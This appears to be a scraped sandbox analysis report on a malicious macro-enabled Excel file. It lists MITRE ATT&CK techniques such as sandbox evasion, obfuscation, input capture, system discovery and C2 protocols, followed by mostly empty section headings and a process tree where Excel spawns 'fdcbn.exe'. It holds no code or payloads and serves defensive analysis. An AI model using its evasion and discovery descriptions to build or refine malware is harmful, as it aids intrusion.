Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report request_form_1611565093.xlsm

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "request_form_1611565093.xlsm"

Indicators

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 4640 Parent PID: 792

General

Analysis Process: fdcbn.exe PID: 4872 Parent PID: 4640